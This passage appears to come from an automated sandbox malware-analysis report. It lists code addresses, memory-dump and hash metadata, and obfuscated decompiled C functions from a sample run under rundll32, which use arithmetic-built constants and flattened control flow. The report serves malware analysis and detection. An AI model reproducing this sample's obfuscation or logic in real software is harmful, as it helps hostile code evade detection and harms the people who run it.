                                                                        0x10009da1
                                                                        0x10009da6
                                                                        0x10009dac
                                                                        0x10009db4
                                                                        0x10009dbc
                                                                        0x10009dc4
                                                                        0x10009dc9
                                                                        0x10009dd1
                                                                        0x10009ddd
                                                                        0x10009de0
                                                                        0x10009de4
                                                                        0x10009dec
                                                                        0x10009df4
                                                                        0x10009dfc
                                                                        0x10009e04
                                                                        0x10009e0c
                                                                        0x10009e14
                                                                        0x10009e1c
                                                                        0x10009e24
                                                                        0x10009e2c
                                                                        0x10009e34
                                                                        0x10009e41
                                                                        0x10009e45
                                                                        0x10009e4d
                                                                        0x10009e55
                                                                        0x10009e62
                                                                        0x10009e66
                                                                        0x10009e6e
                                                                        0x10009e78
                                                                        0x10009e85
                                                                        0x10009e94
                                                                        0x10009e95
                                                                        0x10009e99
                                                                        0x10009ea1
                                                                        0x10009ea9
                                                                        0x10009eae
                                                                        0x10009eb6
                                                                        0x10009ebe
                                                                        0x10009ec6
                                                                        0x10009eca
                                                                        0x10009ed2
                                                                        0x10009eda
                                                                        0x10009ee2
                                                                        0x10009eea
                                                                        0x10009ef7
                                                                        0x10009efb
                                                                        0x10009f03
                                                                        0x10009f0b
                                                                        0x10009f13
                                                                        0x10009f1b
                                                                        0x10009f23
                                                                        0x10009f2b
                                                                        0x10009f33
                                                                        0x10009f3b
                                                                        0x10009f43
                                                                        0x10009f4b
                                                                        0x10009f53
                                                                        0x10009f58
                                                                        0x10009f60
                                                                        0x10009f68
                                                                        0x10009f70
                                                                        0x10009f7e
                                                                        0x10009f82
                                                                        0x10009f8b
                                                                        0x10009f8f
                                                                        0x10009f97
                                                                        0x10009f9f
                                                                        0x10009fa7
                                                                        0x10009fac
                                                                        0x10009fac
                                                                        0x10009fb4
                                                                        0x10009fb4
                                                                        0x10009fb4
                                                                        0x10009fb4
                                                                        0x10009fb6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10009fbc
                                                                        0x1000a07d
                                                                        0x1000a083
                                                                        0x1000a088
                                                                        0x1000a08e
                                                                        0x1000a090
                                                                        0x1000a16a
                                                                        0x1000a175
                                                                        0x1000a175
                                                                        0x1000a096
                                                                        0x1000a0a0
                                                                        0x00000000
                                                                        0x1000a0a0
                                                                        0x10009fc8
                                                                        0x1000a053
                                                                        0x1000a05b
                                                                        0x1000a060
                                                                        0x1000a068
                                                                        0x00000000
                                                                        0x1000a068
                                                                        0x10009fd4
                                                                        0x1000a147
                                                                        0x1000a166
                                                                        0x00000000
                                                                        0x1000a166
                                                                        0x10009fe0
                                                                        0x1000a025
                                                                        0x1000a02d
                                                                        0x1000a02f
                                                                        0x1000a037
                                                                        0x1000a044
                                                                        0x00000000
                                                                        0x1000a044
                                                                        0x10009fe8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000a000
                                                                        0x1000a002
                                                                        0x1000a007
                                                                        0x1000a01e
                                                                        0x1000a009
                                                                        0x1000a011
                                                                        0x1000a017
                                                                        0x1000a017
                                                                        0x1000a007
                                                                        0x1000a0aa
                                                                        0x1000a0b0
                                                                        0x1000a110
                                                                        0x1000a11e
                                                                        0x1000a123
                                                                        0x1000a126
                                                                        0x00000000
                                                                        0x1000a126
                                                                        0x1000a0b2
                                                                        0x1000a0b4
                                                                        0x1000a0cd
                                                                        0x1000a0e9
                                                                        0x1000a0ed
                                                                        0x1000a0f2
                                                                        0x1000a0f7
                                                                        0x1000a0fa
                                                                        0x1000a0ff
                                                                        0x1000a103
                                                                        0x1000a104
                                                                        0x00000000
                                                                        0x1000a104
                                                                        0x1000a0b6
                                                                        0x1000a0bc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000a0be
                                                                        0x1000a0c3
                                                                        0x00000000
                                                                        0x1000a128
                                                                        0x1000a128
                                                                        0x1000a128
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %$'`?$)9$4X$7|$>K$?$BZ$W#W$cM$xY/$|q:;$c
                                                                        • API String ID: 0-1474617872
                                                                        • Opcode ID: c55b65cf264b45a8f1d4d1e29e0531854e93195efa71f3acd17f3e7a948af3bd
                                                                        • Instruction ID: ba7fc6154232bfd8db280ed454fca39f84720541494348eac49d9c349cc68150
                                                                        • Opcode Fuzzy Hash: c55b65cf264b45a8f1d4d1e29e0531854e93195efa71f3acd17f3e7a948af3bd
                                                                        • Instruction Fuzzy Hash: C8B121B15093819FE358CF65C58981BFBE1FBC5788F104A1DF596862A0C3B98A49CF87
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100106C2, Relevance: 15.4, Strings: 12, Instructions: 383COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E100106C2(intOrPtr* __ecx, void* __edx, char _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v1;
				char _v96;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				intOrPtr _v264;
				signed int _v268;
				intOrPtr _v272;
				signed int _v276;
				signed int _v280;
				unsigned int _v284;
				signed int _v288;
				void* _t345;
				intOrPtr _t372;
				void* _t379;
				signed int _t383;
				void* _t391;
				intOrPtr* _t399;
				char _t404;
				intOrPtr* _t410;
				char* _t433;
				char* _t436;
				signed int _t437;
				intOrPtr* _t440;
				signed int* _t442;
				void* _t445;

				_t399 = _a12;
				_push(_t399);
				_push(_a8);
				_t440 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t345);
				_v120 = 0x55e52e;
				_v112 = 0;
				_t442 =  &(( &_v288)[5]);
				_v116 = 0x6a087e;
				_v148 = 0x434e;
				_t437 = 0x13292eb2;
				_v148 = _v148 + 0xffff9485;
				_v148 = _v148 ^ 0xffffd793;
				_v156 = 0xec79;
				_v156 = _v156 ^ 0xb43b0e66;
				_v156 = _v156 ^ 0xb43be21d;
				_v200 = 0xee7d;
				_v200 = _v200 | 0x0533a7d7;
				_v200 = _v200 + 0xfffff45a;
				_v200 = _v200 ^ 0x05338944;
				_v216 = 0x86ca;
				_v216 = _v216 + 0x54b4;
				_v216 = _v216 ^ 0xa0eca1d2;
				_v216 = _v216 ^ 0xa0ec1e31;
				_v232 = 0x5704;
				_v232 = _v232 + 0x87d6;
				_push(0x16);
				_v164 = 0;
				_push(7);
				_v232 = _v232 / 0;
				_v232 = _v232 >> 5;
				_v232 = _v232 ^ 0x000017c2;
				_v240 = 0x5173;
				_v240 = _v240 * 0x25;
				_v240 = _v240 << 0xa;
				_v240 = _v240 / 0;
				_v240 = _v240 ^ 0x06ba4efb;
				_v248 = 0xc74b;
				_v248 = _v248 * 0x7e;
				_v248 = _v248 + 0xffff822f;
				_v248 = _v248 * 0x4c;
				_v248 = _v248 ^ 0x1cf92e4a;
				_v256 = 0x686e;
				_v256 = _v256 * 0x12;
				_v256 = _v256 ^ 0xf8fdd26c;
				_v256 = _v256 * 0x52;
				_v256 = _v256 ^ 0xc03ea1b3;
				_v244 = 0x2add;
				_v244 = _v244 << 0xf;
				_v244 = _v244 + 0xffffde04;
				_v244 = _v244 << 8;
				_v244 = _v244 ^ 0x6e5e34dd;
				_v284 = 0xf4e0;
				_v284 = _v284 + 0xba09;
				_v284 = _v284 | 0xa2bb5836;
				_v284 = _v284 >> 2;
				_v284 = _v284 ^ 0x28aee5c9;
				_v168 = 0x9f31;
				_v168 = _v168 >> 6;
				_v168 = _v168 ^ 0x000048ec;
				_v220 = 0x7e53;
				_v220 = _v220 << 6;
				_v220 = _v220 * 0x50;
				_v220 = _v220 ^ 0x09de0db5;
				_v188 = 0x17a8;
				_v188 = _v188 + 0x52a9;
				_v188 = _v188 / 0;
				_v188 = _v188 ^ 0x00004610;
				_v196 = 0x5cc1;
				_v196 = _v196 + 0xffff31d1;
				_v196 = _v196 | 0xc97284eb;
				_v196 = _v196 ^ 0xffffe02f;
				_v172 = 0xda7e;
				_v172 = _v172 << 0xe;
				_v172 = _v172 ^ 0x369fe494;
				_v144 = 0xccad;
				_v144 = _v144 | 0x339a4d00;
				_v144 = _v144 ^ 0x339a877a;
				_v288 = 0xfcaa;
				_v288 = _v288 << 2;
				_v288 = _v288 + 0x9909;
				_v288 = _v288 << 0xc;
				_v288 = _v288 ^ 0x48bb2562;
				_v152 = 0x61b7;
				_v152 = _v152 << 0x10;
				_v152 = _v152 ^ 0x61b70a03;
				_v140 = 0xc302;
				_v140 = _v140 << 0xf;
				_v140 = _v140 ^ 0x61816c1a;
				_v160 = 0x48ef;
				_v160 = _v160 ^ 0xebfd6bf9;
				_v160 = _v160 ^ 0xebfd7750;
				_v260 = 0x5362;
				_v260 = _v260 >> 6;
				_t404 = 0x6c;
				_v260 = _v260 / 0;
				_v260 = _v260 ^ 0xee3aff63;
				_v260 = _v260 ^ 0xee3aef31;
				_v236 = 0xd35f;
				_v236 = _v236 << 0x10;
				_v236 = _v236 + 0x2900;
				_v236 = _v236 + 0x50af;
				_v236 = _v236 ^ 0xd35f0d2f;
				_v212 = 0x828e;
				_v212 = _v212 | 0x8b388828;
				_v212 = _v212 * 0xa;
				_v212 = _v212 ^ 0x70352860;
				_v228 = 0xeb91;
				_v228 = _v228 ^ 0xa86be6f8;
				_v228 = _v228 + 0xffff5277;
				_v228 = _v228 ^ 0xa86a6f69;
				_v184 = 0xae04;
				_v184 = _v184 + 0xffff62af;
				_v184 = _v184 ^ 0x0000117e;
				_v224 = 0x33a1;
				_v224 = _v224 >> 1;
				_v224 = _v224 >> 7;
				_v224 = _v224 ^ 0x00005b9c;
				_v268 = 0xe65;
				_v268 = _v268 * 0x1a;
				_v268 = _v268 >> 2;
				_v268 = _v268 >> 5;
				_v268 = _v268 ^ 0x00000bed;
				_v176 = 0xa4d1;
				_v176 = _v176 | 0x37797fb5;
				_v176 = _v176 ^ 0x3779d180;
				_v252 = 0x4dfa;
				_v252 = _v252 >> 0xf;
				_v252 = _v252 ^ 0x7040ff32;
				_v252 = _v252 ^ 0x70408cc6;
				_v276 = 0x9261;
				_v276 = _v276 ^ 0x928292e1;
				_v276 = _v276 + 0xbfd3;
				_v276 = _v276 >> 0xd;
				_v276 = _v276 ^ 0x0004a09c;
				_v192 = 0x5c67;
				_v192 = _v192 << 4;
				_v192 = _v192 >> 0xf;
				_v192 = _v192 ^ 0x00002cc8;
				_v204 = 0xa9b8;
				_v204 = _v204 << 5;
				_v204 = _v204 + 0xffff3dee;
				_v204 = _v204 ^ 0x0014203e;
				_v180 = 0xc206;
				_v180 = _v180 * 0x36;
				_v180 = _v180 ^ 0x0028c8dc;
				_v280 = 0x96db;
				_v280 = _v280 + 0xeb7e;
				_v280 = _v280 >> 7;
				_v280 = _v280 ^ 0x33900b7e;
				_v280 = _v280 ^ 0x33901db2;
				_v208 = 0xb5f5;
				_v208 = _v208 >> 6;
				_v208 = _v208 + 0xfc0c;
				_v208 = _v208 ^ 0x0000fee2;
				_t436 = _v132;
				while(1) {
					L1:
					_t427 = _v264;
					_t365 = _v272;
					while(1) {
						_t445 = _t437 - 0x19192d48;
						if(_t445 > 0) {
							goto L23;
						}
						L3:
						if(_t445 == 0) {
							_v124 = _t404;
							_t379 = E100105E8( &_v108,  *((intOrPtr*)( *0x100221b4 + 0x14)), _v148, _v212, _v228, _v184, _v224, _v208,  *((intOrPtr*)( *0x100221b4)),  &_v124);
							_t442 =  &(_t442[8]);
							if(_t379 == 0) {
								_t437 = 0x272c22c8;
							} else {
								_t410 =  &_v1;
								_t433 = _t436;
								do {
									 *_t433 =  *_t410;
									_t433 = _t433 + 1;
									_t410 = _t410 - 1;
								} while (_t410 >=  &_v96);
								_t437 = 0xe3e0850;
							}
							goto L9;
						} else {
							if(_t437 == 0x95d06e9) {
								_t383 = _a4 + 1;
								if((_t383 & 0x0000000f) != 0) {
									_t383 = (_t383 & 0xfffffff0) + 0x10;
								}
								 *((intOrPtr*)(_t399 + 4)) = _t383 + 0x74;
								_push(_t404);
								_t436 = E100157E8( *((intOrPtr*)(_t399 + 4)));
								 *_t399 = _t436;
								if(_t436 == 0) {
									goto L34;
								}
								_t305 = _t436 + 0x74; // 0x74
								_t427 = _t305;
								_t365 =  *((intOrPtr*)(_t399 + 4)) - 0x74;
								_v264 = _t305;
								_t437 = 0x154603b2;
								_v132 = _a4;
								_v272 =  *((intOrPtr*)(_t399 + 4)) - 0x74;
								goto L10;
							} else {
								if(_t437 == 0xe3e0850) {
									_v128 = 0x14;
									_t391 = E10007471(_v156, _v268, _v176, _v252,  &_v128, _v276, _t436 + 0x60, _t404, _v192, _v136);
									_t427 = _v264;
									_t442 =  &(_t442[8]);
									_t365 = _v272;
									_t404 = 0x6c;
									if(_t391 == 0) {
										continue;
									} else {
										_t437 = 0x272c22c8;
										_v164 = 1;
										goto L9;
									}
								} else {
									if(_t437 == 0x13292eb2) {
										_t437 = 0x95d06e9;
										continue;
									} else {
										if(_t437 != 0x154603b2) {
											L30:
											if(_t437 == 0x4324b34) {
												L34:
												return _v164;
											}
											goto L1;
										} else {
											_t280 =  &_v284; // 0xee3aef31
											E1000CB42(_v244,  *_t280, _v168, _t404,  &_v136,  *((intOrPtr*)( *0x100221b4 + 0x10)), _t404, _v220);
											_t442 =  &(_t442[6]);
											asm("sbb esi, esi");
											_t437 = (_t437 & 0xeb9139e0) + 0x306f06ef;
											L9:
											_t365 = _v272;
											_t427 = _v264;
											L10:
											_t404 = 0x6c;
											while(1) {
												_t445 = _t437 - 0x19192d48;
												if(_t445 > 0) {
													goto L23;
												}
												goto L3;
											}
											goto L23;
										}
									}
								}
							}
						}
						L24:
						if(_t437 == 0x272c22c8) {
							_push(_t404);
							E1000D7B0(_v136);
							_t437 = 0x306f06ef;
							goto L9;
						}
						if(_t437 != 0x306f06ef) {
							if(_t437 != 0x31bcf33d) {
								goto L30;
							} else {
								E1001413E(_v144, _v288, _v152, _v140, _v160,  &_v132, _t427,  *((intOrPtr*)( *0x100221b4)),  &_v132, _v260, _v136, _t365, _v236,  &_v132);
								_t442 =  &(_t442[0xc]);
								asm("sbb esi, esi");
								_t437 = (_t437 & 0xf1ed0a80) + 0x272c22c8;
								goto L9;
							}
						}
						_t372 = _v164;
						if(_t372 == 0) {
							E100091CD(_v232, _v240, _v248,  *_t399, _v256);
							goto L34;
						}
						return _t372;
						L23:
						if(_t437 == 0x1c0040cf) {
							E10009970(_v188,  *_t440, _v196, _t427, _a4, _v172);
							_t442 =  &(_t442[4]);
							_t437 = 0x31bcf33d;
							_t404 = 0x6c;
							goto L30;
						}
						goto L24;
					}
				}
			}

































































                                                                        0x100106c9
                                                                        0x100106d3
                                                                        0x100106d4
                                                                        0x100106db
                                                                        0x100106dd
                                                                        0x100106e4
                                                                        0x100106e5
                                                                        0x100106e6
                                                                        0x100106eb
                                                                        0x100106f8
                                                                        0x100106ff
                                                                        0x10010702
                                                                        0x1001070f
                                                                        0x1001071a
                                                                        0x1001071f
                                                                        0x1001072a
                                                                        0x10010735
                                                                        0x10010740
                                                                        0x1001074b
                                                                        0x10010756
                                                                        0x1001075e
                                                                        0x10010766
                                                                        0x1001076e
                                                                        0x10010776
                                                                        0x1001077e
                                                                        0x10010786
                                                                        0x1001078e
                                                                        0x10010796
                                                                        0x1001079e
                                                                        0x100107aa
                                                                        0x100107ac
                                                                        0x100107b6
                                                                        0x100107b8
                                                                        0x100107be
                                                                        0x100107c3
                                                                        0x100107cb
                                                                        0x100107d9
                                                                        0x100107dd
                                                                        0x100107e8
                                                                        0x100107ec
                                                                        0x100107f4
                                                                        0x10010801
                                                                        0x10010805
                                                                        0x10010812
                                                                        0x10010816
                                                                        0x1001081e
                                                                        0x1001082b
                                                                        0x1001082f
                                                                        0x1001083c
                                                                        0x10010840
                                                                        0x10010848
                                                                        0x10010850
                                                                        0x10010855
                                                                        0x1001085d
                                                                        0x10010862
                                                                        0x1001086a
                                                                        0x10010872
                                                                        0x1001087a
                                                                        0x10010882
                                                                        0x10010887
                                                                        0x1001088f
                                                                        0x1001089a
                                                                        0x100108a2
                                                                        0x100108ad
                                                                        0x100108b7
                                                                        0x100108c3
                                                                        0x100108c7
                                                                        0x100108cf
                                                                        0x100108d7
                                                                        0x100108e7
                                                                        0x100108eb
                                                                        0x100108f3
                                                                        0x100108fb
                                                                        0x10010903
                                                                        0x1001090b
                                                                        0x10010913
                                                                        0x1001091e
                                                                        0x10010926
                                                                        0x10010931
                                                                        0x1001093c
                                                                        0x10010947
                                                                        0x10010952
                                                                        0x1001095a
                                                                        0x1001095f
                                                                        0x10010967
                                                                        0x1001096c
                                                                        0x10010974
                                                                        0x1001097f
                                                                        0x10010987
                                                                        0x10010992
                                                                        0x1001099d
                                                                        0x100109a5
                                                                        0x100109b0
                                                                        0x100109bb
                                                                        0x100109c6
                                                                        0x100109d1
                                                                        0x100109d9
                                                                        0x100109e2
                                                                        0x100109e5
                                                                        0x100109e9
                                                                        0x100109f1
                                                                        0x100109f9
                                                                        0x10010a01
                                                                        0x10010a06
                                                                        0x10010a0e
                                                                        0x10010a16
                                                                        0x10010a1e
                                                                        0x10010a26
                                                                        0x10010a33
                                                                        0x10010a37
                                                                        0x10010a3f
                                                                        0x10010a47
                                                                        0x10010a4f
                                                                        0x10010a57
                                                                        0x10010a5f
                                                                        0x10010a67
                                                                        0x10010a6f
                                                                        0x10010a77
                                                                        0x10010a7f
                                                                        0x10010a83
                                                                        0x10010a88
                                                                        0x10010a90
                                                                        0x10010a9d
                                                                        0x10010aa1
                                                                        0x10010aa6
                                                                        0x10010aab
                                                                        0x10010ab3
                                                                        0x10010abe
                                                                        0x10010ac9
                                                                        0x10010ad4
                                                                        0x10010adc
                                                                        0x10010ae9
                                                                        0x10010af1
                                                                        0x10010af9
                                                                        0x10010b01
                                                                        0x10010b09
                                                                        0x10010b11
                                                                        0x10010b16
                                                                        0x10010b1e
                                                                        0x10010b26
                                                                        0x10010b2b
                                                                        0x10010b30
                                                                        0x10010b38
                                                                        0x10010b40
                                                                        0x10010b45
                                                                        0x10010b4d
                                                                        0x10010b55
                                                                        0x10010b62
                                                                        0x10010b66
                                                                        0x10010b6e
                                                                        0x10010b76
                                                                        0x10010b7e
                                                                        0x10010b83
                                                                        0x10010b8b
                                                                        0x10010b93
                                                                        0x10010b9b
                                                                        0x10010ba0
                                                                        0x10010ba8
                                                                        0x10010bb0
                                                                        0x10010bb7
                                                                        0x10010bb7
                                                                        0x10010bb7
                                                                        0x10010bbb
                                                                        0x10010bbf
                                                                        0x10010bbf
                                                                        0x10010bc5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10010bcb
                                                                        0x10010bcb
                                                                        0x10010d1a
                                                                        0x10010d57
                                                                        0x10010d5c
                                                                        0x10010d61
                                                                        0x10010d87
                                                                        0x10010d63
                                                                        0x10010d63
                                                                        0x10010d6a
                                                                        0x10010d6c
                                                                        0x10010d6e
                                                                        0x10010d70
                                                                        0x10010d71
                                                                        0x10010d79
                                                                        0x10010d7d
                                                                        0x10010d7d
                                                                        0x00000000
                                                                        0x10010bd1
                                                                        0x10010bd7
                                                                        0x10010cbf
                                                                        0x10010cc2
                                                                        0x10010cc7
                                                                        0x10010cc7
                                                                        0x10010ccd
                                                                        0x10010cd8
                                                                        0x10010ce1
                                                                        0x10010ce3
                                                                        0x10010ce8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10010cf1
                                                                        0x10010cf1
                                                                        0x10010cf7
                                                                        0x10010cfa
                                                                        0x10010cfe
                                                                        0x10010d03
                                                                        0x10010d0a
                                                                        0x00000000
                                                                        0x10010bdd
                                                                        0x10010be3
                                                                        0x10010c5a
                                                                        0x10010c8d
                                                                        0x10010c92
                                                                        0x10010c96
                                                                        0x10010c9b
                                                                        0x10010ca1
                                                                        0x10010ca2
                                                                        0x00000000
                                                                        0x10010ca8
                                                                        0x10010caa
                                                                        0x10010cb0
                                                                        0x00000000
                                                                        0x10010cb0
                                                                        0x10010be5
                                                                        0x10010beb
                                                                        0x10010c46
                                                                        0x00000000
                                                                        0x10010bed
                                                                        0x10010bf3
                                                                        0x10010e6a
                                                                        0x10010e70
                                                                        0x10010e9c
                                                                        0x00000000
                                                                        0x10010e9c
                                                                        0x00000000
                                                                        0x10010bf9
                                                                        0x10010c16
                                                                        0x10010c1e
                                                                        0x10010c23
                                                                        0x10010c28
                                                                        0x10010c30
                                                                        0x10010c36
                                                                        0x10010c36
                                                                        0x10010c3a
                                                                        0x10010c3e
                                                                        0x10010c40
                                                                        0x10010bbf
                                                                        0x10010bbf
                                                                        0x10010bc5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10010bc5
                                                                        0x00000000
                                                                        0x10010bbf
                                                                        0x10010bf3
                                                                        0x10010beb
                                                                        0x10010be3
                                                                        0x10010bd7
                                                                        0x10010d9d
                                                                        0x10010da3
                                                                        0x10010e28
                                                                        0x10010e30
                                                                        0x10010e37
                                                                        0x00000000
                                                                        0x10010e37
                                                                        0x10010dab
                                                                        0x10010db7
                                                                        0x00000000
                                                                        0x10010dbd
                                                                        0x10010dff
                                                                        0x10010e04
                                                                        0x10010e09
                                                                        0x10010e11
                                                                        0x00000000
                                                                        0x10010e11
                                                                        0x10010db7
                                                                        0x10010e77
                                                                        0x10010e80
                                                                        0x10010e94
                                                                        0x00000000
                                                                        0x10010e99
                                                                        0x10010ead
                                                                        0x10010d91
                                                                        0x10010d97
                                                                        0x10010e5a
                                                                        0x10010e5f
                                                                        0x10010e62
                                                                        0x10010e69
                                                                        0x00000000
                                                                        0x10010e69
                                                                        0x00000000
                                                                        0x10010d97
                                                                        0x10010bbf

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .U$1:$NC$S~$`(5p$bS$g\$sQ$}$~$H$H
                                                                        • API String ID: 0-2586239605
                                                                        • Opcode ID: a1961eb191cd199aeb8209c7e9ea1645c86b8df483a9194aca055b79612b1652
                                                                        • Instruction ID: dc36ea8a0aec24ac7b9885ce2b919ce4aba11c0453d1abd8bba0bdbca8633019
                                                                        • Opcode Fuzzy Hash: a1961eb191cd199aeb8209c7e9ea1645c86b8df483a9194aca055b79612b1652
                                                                        • Instruction Fuzzy Hash: 3A1222755083819FE364CF65C98AA4BBBF1FB84748F108A1CF6D98A260D7B59948CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000A176, Relevance: 15.3, Strings: 12, Instructions: 324COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E1000A176() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _t350;
				intOrPtr _t357;
				void* _t360;
				void* _t361;
				void* _t366;
				void* _t367;
				char _t375;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int* _t414;

				_t414 =  &_v708;
				_v616 = 0x2445;
				_v616 = _v616 >> 0x10;
				_v616 = _v616 ^ 1;
				_v636 = 0xeea4;
				_t367 = 0x3f32878;
				_v636 = _v636 << 0xb;
				_v636 = _v636 << 1;
				_v636 = _v636 ^ 0x0eea4100;
				_v652 = 0xe797;
				_v652 = _v652 ^ 0x321c1edf;
				_v652 = _v652 ^ 0xd996a04c;
				_v652 = _v652 ^ 0xeb8a76ce;
				_v588 = 0xdcfc;
				_v588 = _v588 >> 7;
				_v588 = _v588 ^ 0x00000f60;
				_v612 = 0x8579;
				_v612 = _v612 + 0x6109;
				_v612 = _v612 ^ 0x0000e794;
				_v648 = 0x1b6b;
				_v648 = _v648 + 0xffff6a60;
				_v648 = _v648 << 0x10;
				_v648 = _v648 ^ 0x85cb09dc;
				_v584 = 0x1ff6;
				_v584 = _v584 << 0x10;
				_v584 = _v584 ^ 0x1ff65b4e;
				_v684 = 0xbc40;
				_v684 = _v684 >> 2;
				_v684 = _v684 + 0xffffd1fb;
				_v684 = _v684 | 0x2742d37c;
				_v684 = _v684 ^ 0x2742ef01;
				_v576 = 0x685a;
				_t404 = 0x6c;
				_v576 = _v576 / _t404;
				_v576 = _v576 ^ 0x00007f72;
				_t366 = 0;
				_v708 = 0x6bcc;
				_v708 = _v708 >> 8;
				_t405 = 0x3a;
				_v708 = _v708 * 0x2a;
				_v708 = _v708 >> 7;
				_v708 = _v708 ^ 0x0000462a;
				_v692 = 0xff9b;
				_v692 = _v692 | 0x74d94da3;
				_v692 = _v692 + 0xffffcc68;
				_v692 = _v692 | 0xbe89bc47;
				_v692 = _v692 ^ 0xfed98c58;
				_v632 = 0x3226;
				_v632 = _v632 | 0x070ffe2e;
				_v632 = _v632 / _t405;
				_v632 = _v632 ^ 0x001f3575;
				_v600 = 0xa48;
				_v600 = _v600 + 0xb52e;
				_v600 = _v600 ^ 0x0000cedf;
				_v580 = 0xa18a;
				_v580 = _v580 | 0x0c5a8a6e;
				_v580 = _v580 ^ 0x0c5abff1;
				_v664 = 0xe8f;
				_t406 = 0x37;
				_v664 = _v664 / _t406;
				_t407 = 0x46;
				_v664 = _v664 / _t407;
				_v664 = _v664 ^ 0x00006dce;
				_v640 = 0x71c;
				_v640 = _v640 << 0xe;
				_t408 = 0x49;
				_v640 = _v640 * 0x34;
				_v640 = _v640 ^ 0x5c6c577c;
				_v592 = 0x33b8;
				_v592 = _v592 | 0x07d87d51;
				_v592 = _v592 ^ 0x07d84187;
				_v696 = 0xa98f;
				_v696 = _v696 << 0xf;
				_v696 = _v696 + 0xffffe799;
				_v696 = _v696 + 0xffff3d0e;
				_v696 = _v696 ^ 0x54c69949;
				_v704 = 0x7465;
				_v704 = _v704 + 0xffffe849;
				_v704 = _v704 / _t408;
				_v704 = _v704 + 0xd0f1;
				_v704 = _v704 ^ 0x0000e434;
				_v596 = 0x236f;
				_v596 = _v596 | 0xc5dcb8d9;
				_v596 = _v596 ^ 0xc5dcb094;
				_v644 = 0x8021;
				_v644 = _v644 ^ 0xc828a343;
				_v644 = _v644 >> 3;
				_v644 = _v644 ^ 0x190550b3;
				_v604 = 0xfe6;
				_v604 = _v604 >> 0xb;
				_v604 = _v604 ^ 0x00002a8f;
				_v668 = 0x55eb;
				_v668 = _v668 | 0x71753889;
				_v668 = _v668 << 6;
				_v668 = _v668 ^ 0x5d5f3da4;
				_v608 = 0x70d4;
				_v608 = _v608 << 0xf;
				_v608 = _v608 ^ 0x386a033c;
				_v624 = 0xcf56;
				_t409 = 0x3d;
				_v624 = _v624 / _t409;
				_v624 = _v624 | 0x0bd4b4ae;
				_v624 = _v624 ^ 0x0bd4d1b6;
				_v660 = 0x16e5;
				_t410 = 0x36;
				_v660 = _v660 * 0x41;
				_v660 = _v660 / _t410;
				_v660 = _v660 ^ 0x0000307e;
				_v700 = 0xe2b6;
				_v700 = _v700 + 0x5bb5;
				_v700 = _v700 + 0xffff6142;
				_v700 = _v700 + 0x6e4e;
				_v700 = _v700 ^ 0x000141ab;
				_v656 = 0xb40;
				_v656 = _v656 + 0xffff4f1f;
				_v656 = _v656 ^ 0x21083a9e;
				_v656 = _v656 ^ 0xdef717ac;
				_v672 = 0x17c4;
				_v672 = _v672 | 0x21da6493;
				_t411 = 0x13;
				_v672 = _v672 / _t411;
				_v672 = _v672 * 0x3b;
				_v672 = _v672 ^ 0x691fea24;
				_v620 = 0x1ec3;
				_v620 = _v620 | 0x77b1d73c;
				_v620 = _v620 + 0xffffec92;
				_v620 = _v620 ^ 0x77b1dc68;
				_v628 = 0x112b;
